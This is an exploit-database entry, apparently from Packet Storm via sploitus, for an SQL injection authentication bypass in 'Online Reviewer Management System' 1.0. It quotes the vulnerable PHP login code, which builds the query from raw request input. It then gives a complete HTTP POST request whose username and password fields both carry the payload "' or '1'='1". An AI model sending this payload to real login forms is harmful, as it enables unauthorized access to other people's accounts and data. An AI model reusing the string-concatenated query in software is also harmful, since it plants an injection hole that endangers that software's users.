Share 
## https://sploitus.com/exploit?id=PACKETSTORM:161927
# Exploit Title: Online Reviewer Management System Authentication ByPass  
# Exploit Author: th3d1gger  
# Vendor Homepage: https://sourcecodester.com  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip  
# Version: 1.0  
# Tested on Windows 10  
  
  
#Vulnerable Source Code  
#index.php  
  
if(isset($_REQUEST['btn-login'])){  
  
$username = $_REQUEST['username'];  
$password = $_REQUEST['password'];  
  
$user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'");  
$user_retrieve->execute();  
if($user_retrieve->rowCount() > 0){  
while ($row = $user_retrieve->fetch()) {  
$_SESSION['usertype_id'] = $row['usertype_id'];  
$_SESSION['user_id'] = $row['user_id'];  
$_SESSION['firstname'] = $row['fname'];  
$_SESSION['middlename'] = $row['mname'];  
$_SESSION['lastname'] = $row['lname'];  
$_SESSION['course'] = $row['course'];  
  
$usertype_id = $_SESSION['usertype_id'];  
  
if($usertype_id == 3){  
echo "<script type='text/javascript'>window.location.href = 'students/home/index/';</script>";  
  
}  
elseif ($usertype_id == 1 || $usertype_id == 2 ) {  
echo "<script type='text/javascript'>window.location.href = 'admins/home/index/';</script>";  
  
}  
  
}  
}  
#Attack Request  
POST / HTTP/1.1  
  
Host: reviewmngmnt.olly  
  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-US,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: application/x-www-form-urlencoded  
  
Content-Length: 78  
  
Origin: http://reviewmngmnt.olly/  
  
Connection: close  
  
Referer: http://reviewmngmnt.olly/  
  
Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi  
  
Upgrade-Insecure-Requests: 1  
  
  
  
username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In